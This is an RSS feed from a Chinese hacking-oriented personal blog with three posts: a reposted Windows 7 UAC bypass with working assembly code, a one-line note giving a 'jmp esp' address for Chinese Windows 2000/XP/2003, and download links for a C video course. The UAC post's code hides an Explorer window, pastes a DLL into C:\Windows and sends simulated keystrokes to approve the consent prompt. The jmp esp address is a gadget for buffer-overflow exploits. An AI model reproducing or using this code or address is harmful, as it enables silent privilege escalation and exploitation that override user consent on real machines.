<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>零度x&#039;s blog &#187; 资源分享</title>
	<atom:link href="http://www.lingdux.com/category/%e8%b5%84%e6%ba%90%e5%88%86%e4%ba%ab/feed" rel="self" type="application/rss+xml" />
	<link>http://www.lingdux.com</link>
	<description>Take it slowly,it&#039;s OK,it&#039;s OK.</description>
	<lastBuildDate>Wed, 09 Mar 2011 14:16:17 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Bypass Win7 Uac 实用思路 转自小鱼</title>
		<link>http://www.lingdux.com/2010/220.html</link>
		<comments>http://www.lingdux.com/2010/220.html#comments</comments>
		<pubDate>Wed, 04 Aug 2010 01:09:59 +0000</pubDate>
		<dc:creator>零度x</dc:creator>
				<category><![CDATA[资源分享]]></category>

		<guid isPermaLink="false">http://www.lingdux.com/?p=220</guid>
		<description><![CDATA[Hi, 伙计们最近还好不, 闷热的天气不知你是否和我一样烦躁。不过这样的天气咱们可不能糟蹋了, 所以就扔点闷热的思路吧，主题: Bypass Win7 Uac。

  Win7 Uac的思路很多，但是实用的确很少。例如利用白名单机制通过IFileOperation来yy. 例如还有在很久很久以前通过DuplicateTokenEx,及CreateProcessAsUser来yy的.



<span class="readmore"><a href="http://www.lingdux.com/2010/220.html" title="Bypass Win7 Uac 实用思路 转自小鱼">阅读全文——共2893字</a></span>]]></description>
			<content:encoded><![CDATA[<p>Hi, 伙计们最近还好不, 闷热的天气不知你是否和我一样烦躁。不过这样的天气咱们可不能糟蹋了, 所以就扔点闷热的思路吧，主题: Bypass Win7 Uac。</p>
<p>  Win7 Uac的思路很多，但是实用的确很少。例如利用白名单机制通过IFileOperation来yy. 例如还有在很久很久以前通过DuplicateTokenEx,及CreateProcessAsUser来yy的.</p>
<p><span id="more-220"></span></p>
<p>  恩除了白名单的利用还算可以，第二种就别提了, 已经属于&#8230;.过去时了，不过最让我伤心的是，在今年的杂志上我的心灵又被悄悄的撞伤了, 一篇FireWorm的 Bypass uac的标题把我深深的吸引了，可是当我看到内容的时候，嗯，我哭了. 哭的很伤心.</p>
<p>  唔，前言就说这么些吧，呼呼，纯属无聊的发狂. 今天咱们就来谈点实用思路吧，啥叫实用，那就是用简单的思路和方法来实现需求.恩，符合一个Vxer的思想, 自恋一下.</p>
<p>我们来继续正题吧.</p>
<p>不知道大家是否对win7 的uac进行过了解，这里我先简单的诉说一下.</p>
<p>(1). win7 默认系统分区的根目录是可以创建文件夹的.</p>
<p>(2). win7 uac 现在有自定义级别了(这有点是废话了).</p>
<p>(3). win7 uac默认级别 我们通过交互的形式进行文件操作，你是否发现它的用户权限控制的提示窗口并不是锁死的，我们是可以操作的，呼呼，聪明家伙们似乎想到了什么, 不过这个操作我们利用资源管理器的文件操作方法的接口是没用的，为啥呢？这你就去了解我上面所说的白名单吧。</p>
<p>Ok, 简单了解了以上3点。我们就有对策了, 通过第三点，我们只要能模拟出真实的文件操作，那么我们就可以YY它的用户权限控制窗口。</p>
<p>呀？你问我啥叫真实的操作，OK, 就是平常我们通过输入设备的交互这个我们这里就把它名为真实的文件操作。那么怎么模拟呢？那就接下来直接上Demo吧，因为代码非常Easy，所以我就不对代码进行太多的解释了，相信大家都应该能看懂。</p>
<p>这里我给大家叙述下流程吧,：</p>
<p>我们先将要拷贝文件复制到剪贴板中，然后通过命令行explorer.exe c:\windows 进行隐藏打开，然后取窗口句柄，设置焦点，然后模拟ctrl+v进行复制操作，然后通过模拟enter进行允许 uac 窗口, ok 程序完成。</p>
<p>Demo环境hp win7 家庭高级版, UAC 默认级别</p>
<p>        format PE GUI 4.0<br />
        <br />
        include &#8216;win32ax.inc&#8217;<br />
        include &#8216;system.inc&#8217;</p>
<p>.text</p>
<p>include &#8216;table.inc&#8217;<br />
include &#8216;system\string.asm&#8217;</p>
<p>struct DROPFILES<br />
  pFiles rd 1<br />
  pt        POINT<br />
  fNc        rd 1<br />
  fWide        rd 1<br />
ends</p>
<p>stDropFile   DROPFILES<br />
szFileName   db        &#8217;d:\demo.dll&#8217;, 0</p>
<p>        entry        $<br />
        <br />
                invoke        GlobalAlloc, GMEM_ZEROINIT, sizeof.DROPFILES + szFileName.size  + 5<br />
                xchg        eax, edi<br />
                mov        dword [edi+DROPFILES.pFiles], sizeof.DROPFILES<br />
        <br />
                mov        esi, szFileName<br />
                mov        ecx, szFileName.size<br />
                push        edi<br />
                add        edi, sizeof.DROPFILES<br />
                rep        movsb<br />
                pop        edi</p>
<p>                ; copy data to clipboard<br />
                <br />
                invoke        OpenClipboard, 0<br />
                invoke        EmptyClipboard<br />
                invoke        SetClipboardData, CF_HDROP, edi<br />
                invoke        CloseClipboard<br />
                <br />
                ; open c:\windows<br />
                <br />
                invoke        WinExec, &#8216;explorer.exe c:\windows&#8217;, SW_HIDE<br />
                <br />
                ; set windows focus<br />
                <br />
                invoke        FindWindow, NULL, &#8216;Windows&#8217;<br />
                xchg        eax, ebx<br />
                invoke        SetForegroundWindow, ebx<br />
                <br />
                invoke        Sleep, 1000<br />
                <br />
                ; send ctrl + v<br />
                <br />
                invoke        keybd_event, VK_CONTROL, 0, 0, 0<br />
                invoke        keybd_event, VK_V, 0, 0, 0<br />
                invoke        keybd_event, VK_V, 0, KEYEVENTF_KEYUP, 0<br />
                invoke        keybd_event, VK_CONTROL, 0, KEYEVENTF_KEYUP, 0<br />
                <br />
                ; send enter bypass uac<br />
                <br />
                invoke        keybd_event, VK_RETURN, 0, 0, 0<br />
                invoke        keybd_event, VK_RETURN, 0, KEYEVENTF_KEYUP, 0<br />
                <br />
                invoke        ExitProcess, 0</p>
<p>        .idata</p>
]]></content:encoded>
			<wfw:commentRss>http://www.lingdux.com/2010/220.html/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>通杀中文2K,XP,2K3的jmp esp</title>
		<link>http://www.lingdux.com/2010/218.html</link>
		<comments>http://www.lingdux.com/2010/218.html#comments</comments>
		<pubDate>Tue, 06 Jul 2010 03:50:07 +0000</pubDate>
		<dc:creator>零度x</dc:creator>
				<category><![CDATA[资源分享]]></category>
		<category><![CDATA[jmp esp]]></category>

		<guid isPermaLink="false">http://www.lingdux.com/?p=218</guid>
		<description><![CDATA[做个记录~

地址：0x7ffa4512

]]></description>
			<content:encoded><![CDATA[<p>做个记录~<br />
地址：0x7ffa4512<br />
<span id="more-218"></span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.lingdux.com/2010/218.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>科锐内部C语言视频教程</title>
		<link>http://www.lingdux.com/2010/180.html</link>
		<comments>http://www.lingdux.com/2010/180.html#comments</comments>
		<pubDate>Fri, 21 May 2010 07:52:39 +0000</pubDate>
		<dc:creator>零度x</dc:creator>
				<category><![CDATA[资源分享]]></category>
		<category><![CDATA[C语言]]></category>
		<category><![CDATA[教程]]></category>
		<category><![CDATA[科锐]]></category>
		<category><![CDATA[视频]]></category>

		<guid isPermaLink="false">http://www.lingdux.com/?p=180</guid>
		<description><![CDATA[解压密码：www.lingdux.com

变量类别与编译预处理A.rar

http://www.xun6.com/file/54e974021/%E5%8F%98%E9%87%8F%E7%B1%BB%E5%88%AB%E4%B8%8E%E7%BC%96%E8%AF%91%E9%A2%84%E5%A4%84%E7%90%86A.rar.html

<span class="readmore"><a href="http://www.lingdux.com/2010/180.html" title="科锐内部C语言视频教程">阅读全文——共2612字</a></span>]]></description>
			<content:encoded><![CDATA[<p>解压密码：<a href="http://www.lingdux.com/">www.lingdux.com</a></p>
<p>变量类别与编译预处理A.rar<br />
<a href="http://www.xun6.com/file/54e974021/%E5%8F%98%E9%87%8F%E7%B1%BB%E5%88%AB%E4%B8%8E%E7%BC%96%E8%AF%91%E9%A2%84%E5%A4%84%E7%90%86A.rar.html" target="_blank">http://www.xun6.com/file/54e974021/%E5%8F%98%E9%87%8F%E7%B1%BB%E5%88%AB%E4%B8%8E%E7%BC%96%E8%AF%91%E9%A2%84%E5%A4%84%E7%90%86A.rar.html</a></p>
<p>变量类别与编译预处理B.rar<br />
<a href="http://www.xun6.com/file/9d7605421/%E5%8F%98%E9%87%8F%E7%B1%BB%E5%88%AB%E4%B8%8E%E7%BC%96%E8%AF%91%E9%A2%84%E5%A4%84%E7%90%86B.rar.html" target="_blank">http://www.xun6.com/file/9d7605421/%E5%8F%98%E9%87%8F%E7%B1%BB%E5%88%AB%E4%B8%8E%E7%BC%96%E8%AF%91%E9%A2%84%E5%A4%84%E7%90%86B.rar.html</a></p>
<p>变量类别与编译预处理C.rar<br />
<a href="http://www.xun6.com/file/253eb5b21/%E5%8F%98%E9%87%8F%E7%B1%BB%E5%88%AB%E4%B8%8E%E7%BC%96%E8%AF%91%E9%A2%84%E5%A4%84%E7%90%86C.rar.html" target="_blank">http://www.xun6.com/file/253eb5b21/%E5%8F%98%E9%87%8F%E7%B1%BB%E5%88%AB%E4%B8%8E%E7%BC%96%E8%AF%91%E9%A2%84%E5%A4%84%E7%90%86C.rar.html</a></p>
<p>IEEE-条件-循环A.rar<br />
<a href="http://www.xun6.com/file/be38fee21/IEEE-%E6%9D%A1%E4%BB%B6-%E5%BE%AA%E7%8E%AFA.rar.html" target="_blank">http://www.xun6.com/file/be38fee21/IEEE-%E6%9D%A1%E4%BB%B6-%E5%BE%AA%E7%8E%AFA.rar.html</a></p>
<p><span id="more-180"></span></p>
<p>IEEE-条件-循环B.rar<br />
<a href="http://www.xun6.com/file/a0d175f21/IEEE-%E6%9D%A1%E4%BB%B6-%E5%BE%AA%E7%8E%AFB.rar.html" target="_blank">http://www.xun6.com/file/a0d175f21/IEEE-%E6%9D%A1%E4%BB%B6-%E5%BE%AA%E7%8E%AFB.rar.html</a></p>
<p>IEEE-条件-循环C.rar<br />
<a href="http://www.xun6.com/file/796810f21/IEEE-%E6%9D%A1%E4%BB%B6-%E5%BE%AA%E7%8E%AFC.rar.html" target="_blank">http://www.xun6.com/file/796810f21/IEEE-%E6%9D%A1%E4%BB%B6-%E5%BE%AA%E7%8E%AFC.rar.html</a></p>
<p>IEEE-条件-循环D.rar<br />
<a href="http://www.xun6.com/file/b3c98f021/IEEE-%E6%9D%A1%E4%BB%B6-%E5%BE%AA%E7%8E%AFD.rar.html" target="_blank">http://www.xun6.com/file/b3c98f021/IEEE-%E6%9D%A1%E4%BB%B6-%E5%BE%AA%E7%8E%AFD.rar.html</a></p>
<p>数组A.rar<br />
<a href="http://www.xun6.com/file/7670bdc21/%E6%95%B0%E7%BB%84A.rar.html" target="_blank">http://www.xun6.com/file/7670bdc21/%E6%95%B0%E7%BB%84A.rar.html</a></p>
<p>数组B.rar<br />
<a href="http://www.xun6.com/file/8322ca221/%E6%95%B0%E7%BB%84B.rar.html" target="_blank">http://www.xun6.com/file/8322ca221/%E6%95%B0%E7%BB%84B.rar.html</a></p>
<p>数组C.rar<br />
<a href="http://www.xun6.com/file/61f1b9d21/%E6%95%B0%E7%BB%84C.rar.html" target="_blank">http://www.xun6.com/file/61f1b9d21/%E6%95%B0%E7%BB%84C.rar.html</a></p>
<p>指针（一）A.rar<br />
<a href="http://www.xun6.com/file/1a11d1a21/%E6%8C%87%E9%92%88%EF%BC%88%E4%B8%80%EF%BC%89A.rar.html" target="_blank">http://www.xun6.com/file/1a11d1a21/%E6%8C%87%E9%92%88%EF%BC%88%E4%B8%80%EF%BC%89A.rar.html</a></p>
<p>指针（一）B.rar<br />
<a href="http://www.xun6.com/file/162f9d221/%E6%8C%87%E9%92%88%EF%BC%88%E4%B8%80%EF%BC%89B.rar.html" target="_blank">http://www.xun6.com/file/162f9d221/%E6%8C%87%E9%92%88%EF%BC%88%E4%B8%80%EF%BC%89B.rar.html</a></p>
<p>指针（一）C.rar<br />
<a href="http://www.xun6.com/file/69b791521/%E6%8C%87%E9%92%88%EF%BC%88%E4%B8%80%EF%BC%89C.rar.html" target="_blank">http://www.xun6.com/file/69b791521/%E6%8C%87%E9%92%88%EF%BC%88%E4%B8%80%EF%BC%89C.rar.html</a></p>
<p>指针（一）D.rar<br />
<a href="http://www.xun6.com/file/84ab48421/%E6%8C%87%E9%92%88%EF%BC%88%E4%B8%80%EF%BC%89D.rar.html" target="_blank">http://www.xun6.com/file/84ab48421/%E6%8C%87%E9%92%88%EF%BC%88%E4%B8%80%EF%BC%89D.rar.html</a></p>
<p>指针（二）A.rar<br />
<a href="http://www.xun6.com/file/967b7d821/%E6%8C%87%E9%92%88%EF%BC%88%E4%BA%8C%EF%BC%89A.rar.html" target="_blank">http://www.xun6.com/file/967b7d821/%E6%8C%87%E9%92%88%EF%BC%88%E4%BA%8C%EF%BC%89A.rar.html</a></p>
<p>指针（二）B.rar<br />
<a href="http://www.xun6.com/file/bff90b121/%E6%8C%87%E9%92%88%EF%BC%88%E4%BA%8C%EF%BC%89B.rar.html" target="_blank">http://www.xun6.com/file/bff90b121/%E6%8C%87%E9%92%88%EF%BC%88%E4%BA%8C%EF%BC%89B.rar.html</a></p>
<p>指针（二）C.rar<br />
<a href="http://www.xun6.com/file/524d63a21/%E6%8C%87%E9%92%88%EF%BC%88%E4%BA%8C%EF%BC%89C.rar.html" target="_blank">http://www.xun6.com/file/524d63a21/%E6%8C%87%E9%92%88%EF%BC%88%E4%BA%8C%EF%BC%89C.rar.html</a></p>
<p>指针（二）D.rar<br />
<a href="http://www.xun6.com/file/7ebcb2121/%E6%8C%87%E9%92%88%EF%BC%88%E4%BA%8C%EF%BC%89D.rar.html" target="_blank">http://www.xun6.com/file/7ebcb2121/%E6%8C%87%E9%92%88%EF%BC%88%E4%BA%8C%EF%BC%89D.rar.html</a></p>
<p>指针（二）E.rar<br />
<a href="http://www.xun6.com/file/b9190f521/%E6%8C%87%E9%92%88%EF%BC%88%E4%BA%8C%EF%BC%89E.rar.html" target="_blank">http://www.xun6.com/file/b9190f521/%E6%8C%87%E9%92%88%EF%BC%88%E4%BA%8C%EF%BC%89E.rar.html</a></p>
<p>函数A.rar<br />
<a href="http://www.xun6.com/file/ace1da221/%E5%87%BD%E6%95%B0A.rar.html" target="_blank">http://www.xun6.com/file/ace1da221/%E5%87%BD%E6%95%B0A.rar.html</a></p>
<p>函数B.rar<br />
<a href="http://www.xun6.com/file/9bd43c821/%E5%87%BD%E6%95%B0B.rar.html" target="_blank">http://www.xun6.com/file/9bd43c821/%E5%87%BD%E6%95%B0B.rar.html</a></p>
<p>函数C.rar<br />
<a href="http://www.xun6.com/file/b3e2a1121/%E5%87%BD%E6%95%B0C.rar.html" target="_blank">http://www.xun6.com/file/b3e2a1121/%E5%87%BD%E6%95%B0C.rar.html</a></p>
<p>编译A.rar<br />
<a href="http://www.xun6.com/file/8322acb21/%E7%BC%96%E8%AF%91A.rar.html" target="_blank">http://www.xun6.com/file/8322acb21/%E7%BC%96%E8%AF%91A.rar.html</a></p>
<p>编译B.rar<br />
<a href="http://www.xun6.com/file/89a25f621/%E7%BC%96%E8%AF%91B.rar.html" target="_blank">http://www.xun6.com/file/89a25f621/%E7%BC%96%E8%AF%91B.rar.html</a></p>
<p>字符串处理.rar<br />
<a href="http://www.xun6.com/file/a71d65921/%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%A4%84%E7%90%86.rar.html" target="_blank">http://www.xun6.com/file/a71d65921/%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%A4%84%E7%90%86.rar.html</a></p>
<p>文件操作.rar<br />
<a href="http://www.xun6.com/file/fe96d5321/%E6%96%87%E4%BB%B6%E6%93%8D%E4%BD%9C.rar.html" target="_blank">http://www.xun6.com/file/fe96d5321/%E6%96%87%E4%BB%B6%E6%93%8D%E4%BD%9C.rar.html</a></p>
<p>文件结构.rar<br />
<a href="http://www.xun6.com/file/529124c21/%E6%96%87%E4%BB%B6%E7%BB%93%E6%9E%84.rar.html" target="_blank">http://www.xun6.com/file/529124c21/%E6%96%87%E4%BB%B6%E7%BB%93%E6%9E%84.rar.html</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.lingdux.com/2010/180.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

